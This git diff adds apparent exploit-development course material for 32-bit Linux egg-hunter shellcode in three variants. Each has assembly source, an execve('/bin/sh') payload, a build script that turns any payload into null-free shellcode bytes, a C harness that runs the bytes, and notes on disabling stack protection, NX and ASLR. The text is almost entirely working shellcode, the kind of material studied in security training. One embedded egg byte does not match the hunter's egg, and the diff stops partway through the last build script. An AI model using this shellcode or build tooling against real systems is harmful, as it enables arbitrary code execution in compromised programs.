diff --git a/exam3/access-noloop/NOTES b/exam3/access-noloop/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/access-noloop/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/access-noloop/USAGE b/exam3/access-noloop/USAGE
new file mode 100644
index 0000000..a27d412
--- /dev/null
+++ b/exam3/access-noloop/USAGE
@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access-noloop$ ./make.sh "HereItIs"
+ [I] Using custom EGG mark: HereItIs
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5260 Mar 28 13:01 ./shellcode
+ [+] All done!
+
+3. Run the shellcode
+
+access-noloop$ ./shellcode
+Hunter Length: 66
+Payload Length: 36
+sh-4.1$
+
diff --git a/exam3/access-noloop/hunter.nasm b/exam3/access-noloop/hunter.nasm
new file mode 100644
index 0000000..712a8e3
--- /dev/null
+++ b/exam3/access-noloop/hunter.nasm
@@ -0,0 +1,87 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm *access +noloop modification
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ ; function Prologue
+ push ebp
+ mov ebp, esp
+
+ ; preserve registers and flags
+ pushad
+ pushfd
+
+
+ ; Used for cmp edx, esi below
+ push 0xfffefff
+ pop esi
+ inc esi
+
+ xor edx, edx ; Searching the whole memory
+
+
+ ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+; cmp edx, 0xffff000
+ cmp edx, esi ; We don't want NULL bytes
+ jz Return ; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg)
+
+ or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+ inc edx ; Searching forward
+
+ ; Checking if memory is accessible
+ push byte +0x21 ; 0x21 = 33 = __NR_access
+ pop eax ; EAX points to 0x21
+ lea ebx, [edx+0x8] ; next address to check
+ xor ecx, ecx ; 0: mode = F_OK
+ int 0x80
+ cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
+ jz nextPage
+
+
+ ; Searching for the Egg marker (in current page of memory which is accessible)
+ cmp dword [edx], egg1
+ jne nextAddr
+ cmp dword [edx+0x4], egg2
+ jne nextAddr
+
+ lea ecx, [edx+0x8]
+ jmp ecx
+
+Return:
+ ; restore registers and stack
+ popfd
+ popad
+
+ ; function Epilogue
+ mov esp, ebp
+ pop ebp
+
+ ret
diff --git a/exam3/access-noloop/make.sh b/exam3/access-noloop/make.sh
new file mode 100755
index 0000000..a305e35
--- /dev/null
+++ b/exam3/access-noloop/make.sh
@@ -0,0 +1,132 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+
+ printf("NO LOOP!\n");
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
diff --git a/exam3/access-noloop/payload.nasm b/exam3/access-noloop/payload.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/access-noloop/payload.nasm
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
diff --git a/exam3/access-noloop/shellcode.c b/exam3/access-noloop/shellcode.c
new file mode 100644
index 0000000..d205ccf
--- /dev/null
+++ b/exam3/access-noloop/shellcode.c
@@ -0,0 +1,20 @@
+#include
+#include
+
+unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\x31\xd2\x39\xf2\x74\x2a\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1\x9d\x61\x89\xec\x5d\xc3";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x12\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+
+ printf("NO LOOP!\n");
+}
diff --git a/exam3/access-scasd-noloop/NOTES b/exam3/access-scasd-noloop/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/access-scasd-noloop/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/access-scasd-noloop/USAGE b/exam3/access-scasd-noloop/USAGE
new file mode 100644
index 0000000..87206e1
--- /dev/null
+++ b/exam3/access-scasd-noloop/USAGE
@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access-scasd-noloop$ ./make.sh "HereItIs"
+ [I] Using custom EGG mark: HereItIs
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5260 Mar 28 13:14 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+access-scasd-noloop$ ./shellcode
+Hunter Length: 68
+Payload Length: 36
+sh-4.1$
diff --git a/exam3/access-scasd-noloop/hunter.nasm b/exam3/access-scasd-noloop/hunter.nasm
new file mode 100644
index 0000000..3774230
--- /dev/null
+++ b/exam3/access-scasd-noloop/hunter.nasm
@@ -0,0 +1,92 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm *access-scasd +noloop modification
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ ; function Prologue
+ push ebp
+ mov ebp, esp
+
+ ; preserve registers and flags
+ pushad
+ pushfd
+
+
+ ; Used for cmp edx, esi below
+ push 0xfffefff
+ pop esi
+ inc esi
+
+
+ cld ; clear direction flag (DF) to use scasd properly
+ xor edx, edx ; Searching the whole memory
+
+ ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+; cmp edx, 0xffff000
+ cmp edx, esi ; We don't want NULL bytes
+ jz Return ; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg)
+
+ or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+ inc edx ; Searching forward
+
+ ; Checking if memory is accessible
+ push byte +0x21 ; 0x21 = 33 = __NR_access
+ pop eax ; EAX points to 0x21
+ lea ebx, [edx+0x4] ; address to check
+ xor ecx, ecx ; 0: mode = F_OK
+ int 0x80
+ cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
+ jz nextPage
+
+
+ ; Searching for the Egg marker (in current page of memory which is accessible)
+ mov eax, egg1
+ mov edi, edx
+ scasd ; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4
+ jnz nextAddr
+
+ mov eax, egg2
+ lea edi, [edx+4] ; address to check
+ scasd ; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4
+ jnz nextAddr
+ jmp edi
+
+Return:
+ ; restore registers and stack
+ popfd
+ popad
+
+ ; function Epilogue
+ mov esp, ebp
+ pop ebp
+
+ ret
+
diff --git a/exam3/access-scasd-noloop/make.sh b/exam3/access-scasd-noloop/make.sh
new file mode 100755
index 0000000..a305e35
--- /dev/null
+++ b/exam3/access-scasd-noloop/make.sh
@@ -0,0 +1,132 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+
+ printf("NO LOOP!\n");
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
diff --git a/exam3/access-scasd-noloop/payload.nasm b/exam3/access-scasd-noloop/payload.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/access-scasd-noloop/payload.nasm
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
diff --git a/exam3/access-scasd-noloop/shellcode.c b/exam3/access-scasd-noloop/shellcode.c
new file mode 100644
index 0000000..343e1fd
--- /dev/null
+++ b/exam3/access-scasd-noloop/shellcode.c
@@ -0,0 +1,20 @@
+#include
+#include
+
+unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\xfc\x31\xd2\x39\xf2\x74\x2b\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7\x9d\x61\x89\xec\x5d\xc3";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+
+ printf("NO LOOP!\n");
+}
diff --git a/exam3/access-scasd/NOTES b/exam3/access-scasd/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/access-scasd/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/access-scasd/USAGE b/exam3/access-scasd/USAGE
new file mode 100644
index 0000000..83fad02
--- /dev/null
+++ b/exam3/access-scasd/USAGE
@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access-scasd$ ./make.sh "MyEgg123"
+ [I] Using custom EGG mark: MyEgg123
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5132 Mar 27 23:37 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+access-scasd$ ./shellcode
+Hunter Length: 46
+Payload Length: 36
+sh-4.1$
diff --git a/exam3/access-scasd/hunter.nasm b/exam3/access-scasd/hunter.nasm
new file mode 100644
index 0000000..5017a13
--- /dev/null
+++ b/exam3/access-scasd/hunter.nasm
@@ -0,0 +1,61 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm *access-scasd modification
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ cld ; clear direction flag (DF) to use scasd properly
+ xor edx, edx ; Searching the whole memory
+
+ ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+ or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+ inc edx ; Searching forward
+
+ ; Checking if memory is accessible
+ push byte +0x21 ; 0x21 = 33 = __NR_access
+ pop eax ; EAX points to 0x21
+ lea ebx, [edx+0x4] ; address to check
+ xor ecx, ecx ; 0: mode = F_OK
+ int 0x80
+ cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
+ jz nextPage
+
+
+ ; Searching for the Egg marker (in current page of memory which is accessible)
+ mov eax, egg1
+ mov edi, edx
+ scasd ; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4
+ jnz nextAddr
+
+ mov eax, egg2
+ lea edi, [edx+4] ; address to check
+ scasd ; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4
+ jnz nextAddr
+ jmp edi
diff --git a/exam3/access-scasd/make.sh b/exam3/access-scasd/make.sh
new file mode 100755
index 0000000..00c5f73
--- /dev/null
+++ b/exam3/access-scasd/make.sh
@@ -0,0 +1,130 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
